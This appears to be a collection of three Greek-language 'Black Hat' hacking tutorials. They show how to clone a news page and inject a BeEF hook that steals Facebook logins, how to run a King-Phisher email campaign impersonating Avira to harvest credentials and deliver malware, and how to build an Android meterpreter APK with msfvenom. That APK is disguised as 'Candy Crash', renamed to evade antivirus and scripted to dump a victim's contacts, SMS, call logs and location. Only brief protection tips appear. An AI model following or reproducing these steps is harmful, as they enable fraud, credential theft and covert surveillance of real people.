Πως εκμεταλλευομαστε τα κοινωνικα δρωμενα για μια στοχευμενη επιθεση (Black Hat Method)

Tι θα χρεαστειτε;

1.Kali Linux
2.BeEF
3.Veil-Evasion
4.Domain name
5.Μυαλο

Σε αυτον τον οδηγο θα μαθουμε την τεχνη της κοινωνικης μηχανικης και πως μπορουμε να εκμεταλευτουμε τα κοινωνικα δρωμενα μιας χωρας ωστε να εφαρμοσουμε κακοβουλα τον σκοπο μας.Θα ειναι συντομος οδηγος και με λιγες λεπτομερειες καθως θελω να σας δειξω την μεθοδο και οχι την εγκατασταση αυτης της επιθεσης.

Αυτη την στιγμη τα κοινωνικα δρωμενα της χωρας ειναι οι λεξεις κλειδια

Τελη κυκλοφοριας
Donald Trump
Barack Obama
Φορος ΕΝΦΙΑ
και Black Friday

Απο τα παραπανω αν φτιαξω εναν δολο σε ιστοσελιδα, θα στοχευσω μια συγκεκριμενη ομαδα ατομων μια καποια μικρη αποκλιση

δλδ αν φτιαξω μια ιστοσελιδα με τιτλο  "Τοσο πρεπει να πληρωσετε αν εχετε 150 τετραγωνικα και πανω!!!!" η "ο Νεος φορος ΕΝΦΙΑ" θα τραβηξω ηλικιες απο 28-60+

η αν φτιαξω μια ιστοσελιδα με τιτλο "Πανικος στα πολυκαταστηματα!!!80% οι τσαντες louis vitton" προφανως θα στοχευσω καθαρα γυναικες ηλικιας 18 εως 38+
πιστευω οτι εχετε καταλαβει πως να στοχευετε συγκεκριμενα ατομα κτλ

εγω στο παραδειγμα μου θα χρησιμοποιησω ,μιας και σημερα που γραφω τον οδηγο ειναι παρασκευη τις εκπτωσεις Black friday που εγινε σαλος στην Ελλαδα....

οποτε κανω μια αναζητηση "Black Friday" και βρισκω μια οποιαδηποτε ιστοσελιδα που να λεει καποιο αρθρο

πχ

τωρα προφανως δεν προκειτε να κατσω να γραψω ολοκληρη ιστοσελιδα οποτε σε αυτο θα με βοηθησει το εργαλειο httrack το οποιο ειναι ενα εργαλειο που αντιγραφει ιστοσελιδες για offline αναγνωση.

οποτε εγω επελεξα την ιστοσελιδα ταδε και πηγα στο αρθρο για black friday

οποτε τρεχω την εντολη httrack oloklhro_to_url_ths_istoselidas_me_to_arthro -o /root/var/html/istoselida

και το httrack αντιγραφει ολη την ιστοσελιδα στον φακελο του apache server


τωρα καταχωρουμε ενα domain name και το ανακατευθυνουμε στην εξωτερικη ip μας επισεις προωθουμε την θυρα 3000 και θυρα 80 στην εσωτερικη  ip μας

αυτο το πως θα το κανετε δειτε σε προηγουμενους οδηγους

τωρα πηγαινουμε και βρισκουμε το αρχειο index.html και προσθετουμε μετα το </body>

<script type="text/javascript" src="http://domainname:3000/hook.js"></script>

και οπως καταλαβαινετε θα χρησιμοποιησουμε το Browser Explotation Framework (BeEF) στα kali linux υπαρχει η εκδοση 4.6.0-Alpha εγω χρησιμοποιω την εκδοση 4.7.0-Aplha οπως και να εχει δεν ειναι ο σκοπος του οδηγου μου για να μαθουμε πως το κανουμε εγκατασταση .Απλα στην 4.6.0-Alpha

πριν ξεκινησουμε γραφουμε σε ενα τερματικο leafpad /usr/share/beef-xss/modules/persistence/man_in_the_browser/config.yaml

και προσθετουμε

τωρα αν ενα θυμα ενωθει και παει σε αλλο αρθρο θα συνεχισουμε να τον εχουμε σαν zombie χωρις να επιλεξουμε αυτοματα man in the browser σχετικα με το beEF θα δειτε σε προηγουμενο οδηγο μου.

τωρα οσοι εχετε την εκδοση 4.7.0 απλα θα τρεξετε την εντολη
cp /root/beef/arerules/man_in_the_browser.json /root/beef/arerules/enabled/

η οποια αυτη η εντολη θα μεταφερει το αρχειο json με την λειτουργια man in the browser και οταν ξεκινησετε το beef θα την τρεχει αυτοματα

τωρα αλλαζουμε λιγο επικεφαλιδα και τιτλο στο αρχειο index.html ωστε να το κανουμε ποιο πικαντικο πχ

 τωρα εφοσον τα εχουμε αλλαξει ολα μας μενει να κανουμε την επιθεση

αν θελετε να βαλετα αυτοματα να κλεβει κωδικους facebook δημιουργουμε ενα εγραφο κειμενου και βαζουμε τις εξεις γραμμες

{"name": "Phising",
  "author": "nickthesail0r",
  "browser": "ALL",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {"name": "pretty_theft",
    "condition": null,
    "options": {
      "choice": "Facebook",
      "backing": "Grey",
      "imgsauce": "http://best-page.ga:3000/ui/media/images/beef.png"
    }
  }],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"

το αποθηκευουμε σαν phising.json και το βαζουμε στο φακελο του beef (εκδοση 4.7.0) arerules/enabled

αν θελετε στο φακελο arerules εχει και το win_fake_malware.json
αυτο το ανοιγουμε και αλλαζουμε το url με το url του κακοβουλου αρχειου μας
*εννοειτε οτι εχουμε φτιαξει καποιο κακοβουλο αρχειο και εχουμε προωθησει τις αναλογες θυρες στο router μας


ξεκιναμε το beef με την εντολη ./beef οταν ειμαστε στον φακελο beef

πχ

κανουμε μια δημοσιευση της σελιδα μας στο facebook και περιμενουμε......

οταν τα θυματα πανε στην ιστοσελιδα μετα απο λιγο θα τους εμφανιστει να βαλουν τα στοιχεια του facebook

και αν καποιος μπει απο windows θα δει αυτο και θα κατεβασει το κακοβουλο αρχειο

Με λιγα λογια σε αυτον τον οδηγο απλα μαθαμε πως να πραγματοποιουμε μια επιθεση με την τεχνη της κοινωνικης μηχανικης.....σε παλιοτερους οδηγους μου θα δειτε τι μπορειτε να κανετε με το BeEF και πως μπορειτε να το εκμεταλευτειτε.
Σας συνιστω να διαβασετε το ARE (Autorun Rule Engine) του BeEF ετσι ωστε να μπορεσετε να φτιαξετε την επιθεση στα μετρα σας.

Πως φτιαχνουμε μια εκστρατεια ψαρεματος (King-Phisher)

Σε αυτο τον οδηγο θα μαθουμε να χρησιμοποιουμε το εργαλειο King-Phisher και με αυτο να φτιαξουμε μια εκστρατεια ψαρεματος

Τι θα χρειαστειτε;

1.Kali Linux
2.King-Phisher
3.Ενα Domain Name
4.SMTP server

To King-Phisher υπαρχει στην νεα εκδοση του Kali Linux αλλα υπαρχει καποιο προβλημα με τα πακετα εμεις θα το κανουμε εγκατασταση απο την αρχη
οποτε το κατεβαζουμε με την εντολη git clone
ανοιγουμε ενα τερματικο και γραφουμε

cd opt/

ωστε να παμε στον συγκεκριμενο φακελο

με την εντολη

git clone https://github.com/securestate/king-phisher.git

το κατεβαζουμε στον συγκεκριμενο φακελο

τωρα μενει να το κανουμε εγκατασταση

οποτε γραφουμε στο τερματικο

king-phisher/tools/install.sh και επιλεγουμε y

οταν τελειωσει η εγκατασταση μας τρεχει αυτοματα o server του king-phisher και εμεις με την εντολη    python3 /opt/king-phisher/KingPhisher τρεχουμε τον client

*αν δεν σας εχει ξεκινησει ο server του king-phisher τρεξτε την εντολη                                                                                                                             
 python3 /opt/king-phisher/KingPhisherServer /opt/king-phisher/server_config.yml
η systemctl start king-phisher
*systemctl  disable king-phisher ετσι ωστε οταν ξεκινατε τα kali linux και θελετε να τρεξετε τον apache server να μην τρεχει το King-phisher γιατι ακουει στην θυρα 80
το ξεκινατε με 
systemctl start king-phisher

επισεις τρεξτε την εντολη leafpad /opt/king-phisher/server_config.yml

και αλλαζουμε την διαδρομη /var/www σε /var/www/html
πχ

 

ξεκιναμε το king-phisher με την εντολη

python3 /opt/king-phisher/KingPhisher

βαζουμε τα κριτηρια συνδεσης μας αυτα που κανουμε δλδ login στα kali linux

και μας παει εδω για να δημιουργησουμε την εκστρατεια μας

κανουμε μια παυση εδω.......

Πχ η δικια μου εκστρατεια ειναι να κλεψω τα κριτηρια συνδεσης και να μολυνω υπολογιστες

οποτε παω στο hostinger ,φτιαχνω ενα λογαριασμο επιλεγω ενα domain name αναλογα με τι επιθεση θελω να κανω και ανακατευθυνω το domain name στην εξωτερικη μου ip

δειτε σε παλιοτερους οδηγους πως
πχ η ανακατευθυνση

 οποτε το domain name μου ειναι avira.hol.es
τωρα εφοσον τα εχετε φτιαξει αυτα συνεχιζουμε με το king-phisher

επιλεγουμε New Campaign

 επιλεγουμε next

 εδω βαζουμε το ονομα της εκστρατιας μας και την περιγραφη

εδω αν θελουμε βαζουμε αν ενα θυμα επισκευθει για δευτερη φορα την σελιδα να μην μπορει να ξαναμπει ετσι ωστε να μην του κινησουμε υποψιες

περιγραφη της ετερειας πχ Avira Antivirus αν θελετε βαζετε τα στοιχεια

εδω βαζετε ποσο θελετε να κρατησετε την εκστρατεια δλδ ποσο καιρο να μαζευει στοιχεια κτλ

και τελος

επιλεγουμε την εκστρατια μας

και βλεπουμε τις ρυθμισεις που πρεπει να βαλουμε για να τρεξει η εκστρατια μας

πριν τις συμπληρωσουμε τρεχουμε την εντολη

git clone https://github.com/nickthesail0r/King-Phisher-Avira-Update.git

με αυτη την εντολη κατεβαζουμε την σελιδα που τροποποιησα εγω για το avira
*αλλαξτε την αναλογα με τις αναγκες σας

με την εντολη

mv '/root/King-Phisher-Avira-Update/King-Phisher-Avira-Update/failed' '/root/King-Phisher-Avira-Update/King-Phisher-Avira-Update/images' '/root/King-Phisher-Avira-Update/King-Phisher-Avira-Update/include' '/root/King-Phisher-Avira-Update/King-Phisher-Avira-Update/login' '/root/King-Phisher-Avira-Update/King-Phisher-Avira-Update/scan' /var/www/html

μεταφερουμε τα αρχεια στην διαδρομη /var/www/html

αυτο το κανετε και με copy paste πχ

τρεχουμε την εντολη

ls /var/www/html

και πρεπει να εχουμε αυτα τα αρχεια

τωρα πηγαινουμε στο router μας και προωθουμε την θυρα 80 στην εσωτερικη μας ip δειτε παλιοτερους οδηγους πως

πηγαινουμε στο King-Phisher παλι και γραφουμε το domain name μας /login

μετα επιλεγουμε Verify URL

αν ολα ειναι σωστα τοτε

 στην συνεχεια μας μενει να ρυθμισουμε τον SMTP server

παταμε εδω και κανουμε εγραφη

μετα επιλεγουμε SMTP και More Settings

 σημειωνουμε τα εξεις στοιχεια

δλδ το email σας τον κωδικο και smtp-pulse.com:2525

πηγαινουμε στο King-Phisher και βαζουμε στο Source Email(SMTP)το ιδιο email που φτιαξαμε λογαριασμο στο SendPulse
στο Source Email(MIME) βαζουμε το ψευτικο email αποστολεα
στο Friendly Allias ενα ψευτικο ονομα αποστολεα
και στο Subject To θεμα του email

μετα πηγαινουμε στην καρτελα Edit

και γραφουμε τις εξεις γραμμες

<html>
</body>
<img src="http://avira.hol.es/images/logo.png?id={{ uid }}"/>
<br>
Special offer upgrade for Free your Avira antivirus
<br>
<a href="{{ url.webserver }}">Click Here</a>
<br>
<br>
{{ sender.friendly_alias }}
<br>
<br>
{{ sender.email }}
<br>
{{ tracking_dot_image_tag }}
</body>
</html>
εσεις βαζετε το domain σας στην γραμμη

<img src="http://avira.hol.es/images/logo.png?id={{ uid }}"/>

επιλεγουμε preview θα μας πει να το αποθηκευσουμε και βλεπουμε τι εχουμε φτιαξει

πηγαινουμε παλι στην καρτελα configure και επιλεγουμε την λιστα με τα email που θελουμε να επιτεθουμε

απο το Veil-evasion δημιουργουμε εναν ιο και τον ονομαζουμε Αvira_Antivirus_v3.37.exe
τον μεταφερουμε στην διαδρομη /var/www/html
*δειτε σε προηγουμενους οδηγους πως
στο αρχειο failed θα δειτε το href για να βαλετε την διαδρομη με το domain σας
πχ

μετα ξεκιναμε το armitage και το βαζουμε να ακουει στην θυρα που δημιουργησαμε τον ιο
*μην ξεχασετε να προωθησετε την θυρα στο router

πηγαινουμε μετα στην καρτελα send και επιλεγουμε start

βαζουμε τα στοιχεια

και το King Phisher στελνει το email

στο ηλεκτρονικο ταχυδρομειο του θυματος θα του εμφανιστει αυτο

οταν πατησει στο μνμ θα τον ανακατευθυνει εδω

το θυμα θα βαλει τα κριτηρια συνδεσης του για να κανει login
και θα τον ανακατευθυνει εδω στο ψευτικο update

μετα το ψευτικο σφαλμα

οταν πατησει download και κατεβασει τον ιο τοτε θα τον δειτε σαν slave
στο armitage απο εκει και περα θα μπορειτε να κανετε οτι θελετε στον υπολογιστη του

επιστρεφουμε στο King-Phisher στην καρτελα View Campaign

εδω βλεπουμε το ποσοστο επιτυχειας λειτουργικα κτλ

εδω βλεπουμε την εξωτερικη ip των θυματων email και αν πατησανε στο email που στειλαμε

εδω βλεπουμε ποιος πηγε στην σελιδα ψαρεματος πχ βλεπουμε εξωτερικη ip ,τοποθεσια ,email και απο ποιο προγραμμα περιηγησης μπηκε

τελος βλεπουμε τα κριτηρια συνδεσης του

το King-phisher μπορειτε να το χρησιμοποιησετε και χωρις να στειλετε καποιο email απλα μονο το link του domain σας βεβαια πρεπει να αλλαξετε στο αρχειο server_config.yml

την εξεις γραμμη απο true σε false

 
Γενικα το King-Phisher ειναι ενα παρα πολυ καλο εργαλειο για να ψαρευετε μαζικα η να μαζευετε διαφορες πληροφοριες αναλογα με τις αναγκες σας


Πως θα προστατευτειτε;

Παντα να κοιτατε το ονομα του Domain πχ στο παραδειγμα της δικιας μου εκστρατιας το πραγματικο ειναι www.avira.com και το δικο μου ειναι www.avira.hol.es
Αν δεν ειστε σιγουροι για την προελευση ενος μηνυματος η μιας ιστοσελιδας απλα μην την επισκευθειτε η βαλτε λανθασμενα στοιχεια συνδεσεις πχ αν βαλετε λανθασμενα στοιχεια συνδεσεις και δεν σας πει οτι ειναι λαθος τοτε ειναι σελιδα ψαρεματος....απλη λογικη

Πως κλεβουμε επαφες,μηνυματα και τηλεφωνικες κλησεις απο το κινητο ενος στοχευμενου χρηστη

Τι θα χρειαστειτε;

1.Kali Linux 2.0
2.Eνα δωρεαν domain

Κανουμε εγγραφη ενος domain πχ πατηστε εδω
οταν τελειωσουμε με την εγγραφη τοτε πηγαινουμε και γραφουμε τι ονομα θελουμε να εχει το domain μας

πχ 

το ονομα που εδωσα στο domain μου ειναι googleapps-store.ga
εσεις βαζετε οτι θελετε
οταν κανετε checkout κτλ πηγαινουμε στα domains , Mydomains και επιλεγουμε  Manage Domain

μετα

βαζουμε την εξωτερικη μας ip και επιλεγουμε save changes

τωρα  αυτο που καναμε ειναι
οταν καποιος παει στο http://googleapps-store.ga
θα κατευθυνετε στην εξωτερικη μας ip

συνεχιζουμε

ανοιγουμε ενα τερματικο και γραφουμε

service postgresql start

μετα επιλεγουμε το εικονιδο του armitage αριστερα της οθονης

 επιλεγουμε connect

 επιλεγουμε yes

 περιμενουμε να μας ανοιξει

 οταν μας ανοιξει το armitage στην αναζητηση γραφουμε
 android reverse_tcp

επιλεγουμε με διπλο κλικ meterpreter reverse_tcp

στο LHOST βαζουμε το ονομα του domain που φτιαξαμε και μια θυρα που θελουμε να επικοινωνει στο output βαζουμε raw και επιλεγουμε Launch

δινουμε ενα ονομα πχ ios.apk και επιλεγουμε save

το armitage εχει φτιαξει την ιο στην διαδρομη Home(root)

ξανα επιλεγουμε android meterpreter reverse_tcp και βαζουμε μονο την θυρα που βαλαμε οταν φτιαξαμε τον ιο πχ 8888 και επιλεγουμε Launch

και το armitage ακουει για καποια συνδεση

τωρα αν μεταφερετε τον ιο στην συσκευη και το τρεξετε σας θα δειτε οτι εμφανιζετε ενα αχαρο εικονιδιο συν αν εχετε καποιο antivirus θα σας το βγαλει σαν ιο .

πχ

οι πληροφοριες που μας βγαζει το antivirus

και βλεπετε οτι 30 απο τα 35 antivirus βρισκουνε τον ιο μας

αν δεν εχουμε καποιο antivirus και παμε να κανουμε την εγκατασταση

τοτε θα δουμε αυτο

οταν τελειωσετε με την εγκατασταση τοτε θα δειτε αυτο

αν το τρεξετε θα δειτε οτι δεν σας ανοιγει κατι αλλα σας εμφανιζει στο armitage το κινητο σας

οπως καταλαβαινετε σε πραγματικες συνθηκες το θυμα σας δεν θα το τρεξει καν

οποτε για να λυσουμε αυτο το προβλημα θα εφαρμοσουμε αντιστροφη μηχανικη

το εργαλειο που θα χρησιμοποιησουμε ειναι το apktool

το apktool ειναι ενα εργαλειο το οποιο κανει αποσυμπιληση και συμπιληση σε εφαρμογες android ωστε να δειτε  ενμερη τον κωδικα και να τον τροποποιησετε

οποτε περνουμε το αρχειο ios.apk που εχουμε φτιαξει

(αν θελετε μπορειτε να φτιαξετε γρηγορα με την εντολη 

msfvenom -p android/meterpreter/reverse_tcp --platform android --arch dalvik LHOST="googleapps-store.ga" LPORT=8888 R > ios.apk )

οποτε τωρα για να κανουμε αποσυμπιληση(decompiled) του αρχειου γραφουμε

apktool.jar d ios.apk  η (apktool d ios.apk)

*αν εχετε προβλημα με το apktool τοτε ακολουθηστε αυτο τον οδηγο εδω

 στην διαδρομη Home(root) μας δημιουργησε εναν φακελο με το ονομα ios

εμεις τωρα για να παρακαμψουμε το antivirus θα παμε στον φακελο smali - metasploit και θα αλλαξουμε το ονομα απο metasploit σε οτι θελουμε πχ κατι που να συσχετιζει την εφαρμογη μας αν δεν εχετε αποφασισει ονομαστε το app

τωρα πηγαινουμε στον φακελο stage

εδω θα ανοιξουμε ενα ενα ολα τα αρχεια με leafpad και θα αλλαξουμε το metasploit σε app πχ

και

για να το κανουμε αυτο ποιο γρηγορα ανοιγουμε με leafpad ενα ενα τα αρχεια .smali παταμε ctrl+r γραφουμε πανω metasploit απο κατω app επιλεγουμε Replace all at once μετα find and Replace επειτα παταμε ctrl+s για να αποθηκευση και ctrl+q για να κλεισει το κανουμε σε ολα τα αρχεια που βρισκοντε στον φακελο stage

οταν τελειωσουμε παμε στον αρχικο φακελο ios και ανοιγουμε το αρχειο androidmanifest.xml και αλλαζουμε παλι  metasploit σε app

με αυτο τον τροπο οταν συμπιλησουμε (compiled)την εφαρμογη τοτε θα εχουμε παρακαμψει ολα τα antivirus

τωρα μας μενει να αλλαξουμε το εικονιδιο και το ονομα της εφαρμογης ωστε να ειναι ποιο πειστικη

καθως εχουμε ανοικτο το androidmanifest.xml

κανουμε τις εξεις αλλαγες

<application android:label="@string/app_name">

σε

<application android:label="Candy Crash" android:icon="@drawable/icon">

και 

<activity android:label="@string/app_name" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay"> 

σε

<activity android:label="Candy Crash" android:name=".MainActivity" android:theme="@android:style/Theme.NoDisplay"> 

αποθηκευουμε και κλεινουμε το androidmanifest.xml

πηγαινουμε στον φακελο res και δημιουργουμε

3ς φακελους με τα εξεις ονοματα

drawable-hdpi-v4
drawable-ldpi-v4
drawable-mdpi-v4

μεσα στους φακελους θα βαλουμε την εικονα που θελουμε να δειχνει η εφαρμογη μας πχ

στον φακελο drawable-mdpi-v4 η εικονα που πρεπει να βαλουμε πρεπει να εχει ονομα icon.png και να εχει διαστασεις 48x48

στον φακελο drawable-ldpi-v4 36x36

και στον φακελο  drawable-hdpi-v4 72x72

για να το κανουμε αυτο εφοσον ονομασαμε την εφαρμογη μας Candy crash κανουμε αναζητηση για εικονες Candy crash σε .png και τις διαστασεις

πχ

 γραφουμε candy crash.png και επιλεγουμε εικονες

μετα πηγαινουμε στα εργαλεια αναζητησης επιλεγουμε μεγεθος και ακριβως

βαζουμε τις διαστασεις και κατεβαζουμε την εικονα
της αλλαζουμε ονομα σε icon.png και την αποθηκευουμε στον αναλογο φακελο

τωρα ειμαστε ετοιμοι να κανουμε compiled τον ιο

για να το κανουμε αυτο

τρεχουμε την εντολη

apktool.jar b /root/ios

τωρα για να μπορεσει καποιος να τρεξει την εφαρμογη μας πρεπει να την υπογραψουμε

πριν την υπογραψουμε πρεπει να δημιουργησουμε την ψηφιακη μας υπογραφη

τρεχουμε την εντολη


keytool -genkey -v -keystore ypografh.keystore -alias nickthesail0r -keyalg RSA -keysize 2048 -validity 10000

τα κοκκινα γραμματα τα αλλαζετε

θα μας ζητησει να βαλουμε κωδικο και μετα τα στοιχεια της υπογραφης πχ ονομα,χωρα,οργανισμο κτλ οταν τελειωσετε γραφετε yes και enter

στην διαδρομη Home(root) θα σας εχει δημιουργηθει το αρχειο ypografh.keystore

τωρα εφοσον φτιαξαμε την υπογραφη πρεπει να υπογραψουμε την εφαρμογη ios.apk

οποτε τρεχουμε την εντολη 

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore ypografh.keystore /root/ios/dist/ios.apk nickthesail0r

βαζουμε τον κωδικο που βαλαμε οταν φτιαξαμε την υπογραφη και υπογραφουμε την εφαρμογη

εχουμε τελειωσει τον ιο θα τον βρουμε στην διαδρομη /root/ios/dist/

αν θελετε τρεξτε το αρχειο για να δειτε αν δεν εχετε κανει καποιο λαθος κτλ

τωρα μας μενει να εφαρμοσουμε κοινωνικη μηχανικη

αλλαζουμε τo αρχειο ios.apk  σε candycrash.apk πχ

και με την εντολη mv /root/ios/dist/candycrash.apk /var/www/html το μεταφερουμε στην διαδρομη του apache server μας

μετα γραφουμε στο τερματικο leafpad /var/www/html/index.html

και γραφουμε τον παρακατω κωδικα html

<html><head></script></head><div align="center" id="flashDiv" style="position:absolute; top:0%; left:0%; z-index:1;"><a target="_blank" href="http://googleapps-store.ga/ios.apk">
<img src="http://googleapps-store.ga/1.jpg"><meta name="viewport" content="width=device-width" content="hight=device-hight" scale=user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="HandheldFriendly" content="true"></a>
</div></html>

αποθηκευουμε

απο το κινητο μας πηγαινουμε στο play store και κανουμε αναζητηση candy crash

και παιρνουμε ενα στιγμιοτυπο της οθονης μας πχ

τις μεταφερουμε στον υπολογιστη μας

κανουμε εγκατασταση του GIMP (προγραμμα επεξεργασιας φωτογραφιων)

apt-get install gimp

οταν γινει η εγκατασταση ανοιγουμε την εικονα με το gimp

και προσεκτικα σβηνουμε οτι προδιδει οτι ειναι τραβηγμενο απο κινητο

μεχρι να εχουμε περιπου το παρακατω αποτελεσμα

αποθηκευουμε σε 1.jpg και το μεταφερουμε στην διαδρομη /var/www/html/

τωρα σηκωνουμε τον apache server μας με την εντολη

service apache2 start

οταν γραψουμε το domain μας πχ http://googleapps-store.ga στο κινητο μας πρεπει να μας εμφανισει  αυτο

*μην ξεχασετε να εχετε προωθησει στο router σας την θυρα 80 για τον apache web server και 8888 που θα ακουει το armitage

πριν το στειλουμε στο θυμα μας γραφουμε την εντολη

leafpad entoles.rc

και βαζουμε μεσα τις παρακατω εντολες

dump_calllog
dump_contacts
dump_sms
wlan_geolocate

αποθηκευουμε μετα παμε στο armitage και γραφουμε
 
set AutoRunScript multi_console_command -rc /root/entoles.rc

μετα στην διπλα καρτελα που ακουει για το θυμα γραφουμε rexploit -j

το θυμα οταν τρεξει τον ιο αυτοματα το armitage θα εκτελεσει τις ποιο πανω εντολες που βαλαμε στο αρχειο entoles.rc ετσι θα εχουμε παρει γρηγορα τις επαφες ,τα sms ,τις τηλεφωνικες κλησεις του και την τοποθεσια που βρισκετε το θυμα

*εσεις μπορειτε να βαλετε οτι θελετε πχ να παρετε καποιο αρχειο,να ηχογραφησετε ,να παρετε καποια ληψη απο την καμερα κτλ

τωρα το στελνετε στο θυμα ΟΤΑΝ δειτε οτι στην συνομιλια στο facebook λεει οτι ειναι συνδεδεμενος απο κινητο

Δειγμα περιπου πως θα το πλασαρετε στο θυμα

το θυμα παει στην σελιδα, οπουδηποτε και να πατησει θα του κατεβει ο ιος

oταν παει να κανει εγκατασταση θα δει αυτο

και οταν το τρεξει τοτε θα δειτε το θυμα στο armitage

αυτοματα εχετε παρει ηδη επαφες,μνμ,κλησεις και τοποθεσια

οι επαφες, μνμ ,κλησεις κτλ αποθηκευονται στην διαδρομη

/usr/share/armitage

πχ το αρχειο κλησεων

μετα εδω μπορειτε να κανετε οτι θελετε βεβαια το θυμα θα διαγραψει την εφαρμογη εφοσον δεν θα εχει καποια χρηση κτλ
ομως εσεις την κανατε την δουλεια σας

Σε αυτο τον οδηγο απλα μαθαμε πως να κανουμε στην ουσια εναν ιο  να φαινεται πειστικος ,σε επομενο οδηγο θα μαθουμε πως κανουμε inject σε οποια εφαρμογη θελουμε.
 
Πως θα προστατευτειτε;

Ποτε μην κανετε εγκατασταση εφαρμογων απο αγνωστες πηγες
Βεβαια ακομα και να κανετε εγκατασταση καποιας εφαρμογης απο το
play store παντα να κοιτατε τι δικαιωματα εχει η εφαρμογη πχ μια εφαρμογη αριθμομηχανης δεν πρεπει να εχει δικαωματα να κανει αναγνωση βιντεο , φωτογραφιων να κοιταει κλησεις,μνμ κτλ

Αυτο το κομματι θα το δουμε σε επομενο οδηγο